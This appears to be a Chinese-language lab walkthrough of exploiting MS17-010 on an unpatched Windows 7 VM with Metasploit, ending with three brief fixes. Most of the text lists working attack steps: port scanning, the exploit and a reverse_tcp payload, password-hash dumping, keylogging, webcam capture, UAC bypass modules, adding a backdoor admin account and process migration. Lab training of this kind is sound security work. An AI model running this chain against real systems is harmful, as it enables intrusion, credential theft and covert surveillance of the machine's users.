MS17-010

208 阅读2分钟

实验需求

一台kali攻击机ip:10.165.240.18

一台Windows7靶机(需要桥接,无补丁,关闭防火墙)ip:10.165.240.14

实验步骤

测试连通性

image.png

发现连通性完好

主机扫描

image.png

发现靶机开放445端口

进入msf平台

image.png

搜索漏洞模块

image.png

auxiliary是扫描模块

exploit是攻击模块

使用扫描模块

image.png

也可以

use auxiliary/scanner/smb/smb_ms17_010

设置IP地址

image.png

验证

image.png 发现存在17-010漏洞

使用攻击模块

image.png

设置payload

image.png 设置IP地址

image.png 验证

image.png

run和exploit都是可以的

后渗透****

image.png

获取密码hash值

可通过工具或在线网址进行解密 

如果需要远程连接

需要再开一个终端

远程桌面登录靶机
rdesktop -u 用户名 -p 密码 靶机IP:3389

rdesktop IP地址

getuid          #获取靶机uid
shell           #进入靶机shell
screenshot      #靶机截屏
webcam_snap     #用靶机摄像头拍照
webcam_stream   #用靶机摄像头录像
keyscan_start   #开启键盘记录
keyscan_dump    #捕获键盘记录
keyscan_stop    #停止键盘记录

查看系统信息 sysinfo

查看是否为虚拟机 run post/windows/gather/checkvm

列举当前登录的用户        run post/windows/gather/enum_logged_on_users

Meterpreter自动提权命令
getsystem

提权命令执行失败,绕过uac
use exploit/windows/local/bypassuac
set payload windows/meterpreter/reverse_tcp
ser LHOST=IP地址
set session 1
exploit

绕过UAC提权
先获取session    输入 bg 
输入提权模块 use exploit/windows/local/ask
再输入 options 查看配置参数
把刚才的session输入进去:set session 1
,再run 一下

 shell

进入靶机shell(cmd)

第一步

chcp 65001        #解决乱码

net user 用户名 密码 /add
提升用户权限为管理员
net localgroup Administrator 用户名 /add

使用msf模块提权
要想提权必须是已经拿到meterpreter 然后将当前meterpreter 后台 meterprerer中输入 background
1、 查看可用模块 MSF终端中输入 search bypassuac 查看提权模块
2、 选择一个适合当前系统的提权模块 我这边使用的是win10系统
那我们使用:use exploit/windows/local/bypassuac_windows_store_reg 尝试提权
这个模块不行就换一个 use exploit/windows/local/bypassuac_sluihijack
或者 use exploit/windows/local/bypassuac_dotnet_profiler
3 配置模块使用参数 终端内输入: show options
4 可以看到需要配置 session 终端内输入:set session {需要提权的session id}
5 执行提权 终端内输入:run
6 获取到meterpreter后 我们在终端内 输入getuid 看实际还没有提权成功 需要在还终端内在输入 getsystem 获取权限
7 获取权限完成后 输入getuid 即可看到 已经获取到SYSTEM 最高权限了

进程迁移:
1:查看当前会话的进程id
getpid
2:查看目标运行的进程
ps
3:绑定进程
migrate pid

修复方法

1:关闭445端口

2:开启防火墙

3:打上补丁